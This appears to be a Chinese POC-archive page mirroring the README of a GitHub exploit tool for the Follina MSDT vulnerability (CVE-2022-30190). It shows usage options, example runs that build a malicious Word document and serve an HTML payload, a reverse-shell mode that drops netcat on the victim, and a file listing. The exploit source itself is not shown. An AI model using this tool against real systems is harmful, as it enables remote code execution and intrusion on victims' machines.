POC详情: 342507988624788c022b7b8e877f6ed49466086c

来源
https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190
关联漏洞
标题: Microsoft Windows Support Diagnostic Tool 操作系统命令注入漏洞 (CVE-2022-30190)
描述:Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具。 Microsoft Windows Support Diagnostic Tool (MSDT)存在操作系统命令注入漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows
描述
Implementation of FOLLINA-CVE-2022-30190
介绍
# FOLLINA-CVE-2022-30190
Implementation of FOLLINA-CVE-2022-30190

---

This repository contains an exploitation tool for the vulnerability `FOLLINA-CVE-2022-30190`

### **Disclaimer**
This tool developed for security testing and research purposes.
by cloning / forking this tool the origin developer withdraw any responsibilities on the actors actions.

---
### **Prerequisites**
1. read about the CVE-2022-30190 from <a href="https://ethical.blue/textz/n/32">here</a>
2. prepare your testing environment (I suggest using Virtual Box + Vagrant)
- Download VirtualBox from <a href="https://www.virtualbox.org/wiki/Downloads">here</a>  
- Download Vagrant form <a href="https://www.vagrantup.com/Downloads">here</a> 
- Read about Vagrant CLI from <a href="https://developer.hashicorp.com/vagrant/docs/cli">here</a>

---
Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.
<img src="#">

### **Usage**
```textmate
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)
```

---
### **Examples**

Pop `calc.exe`:
```textmate
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000
```

Pop `cmd.exe`:
```textmate
$ python3 exploit.py --command "cmd"
```

Get a reverse shell on port 9001. Note, this downloads a netcat binary onto the victim and places it in `C:\Windows\Tasks`. 
It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.

```textmate
$ python3 exploit.py --reverse 9001
```
<img src="#">
文件快照

 [4.0K]  /data/pocs/342507988624788c022b7b8e877f6ed49466086c
├── [4.0K]  bin
│   ├── [ 556]  html.stg.bin
│   └── [ 252]  ps1.stg.bin
├── [4.0K]  doc
│   ├── [1.3K]  [Content_Types].xml
│   ├── [4.0K]  docProps
│   │   ├── [ 703]  app.xml
│   │   └── [ 734]  core.xml
│   ├── [4.0K]  _rels
│   └── [4.0K]  word
│       ├── [3.8K]  document.xml
│       ├── [1.5K]  fontTable.xml
│       ├── [4.0K]  _rels
│       │   ├── [ 975]  documents.xml.rels
│       │   └── [ 949]  document.xml.rels
│       ├── [2.9K]  settings.xml
│       ├── [ 29K]  styles.xml
│       ├── [4.0K]  theme
│       │   └── [6.6K]  theme1.xml
│       └── [ 802]  webSettings.xml
├── [2.8K]  exploit.py
├── [3.2K]  handlers.py
├── [1.1K]  LICENSE
├── [2.0K]  README.md
└── [ 168]  requirements.txt

7 directories, 18 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。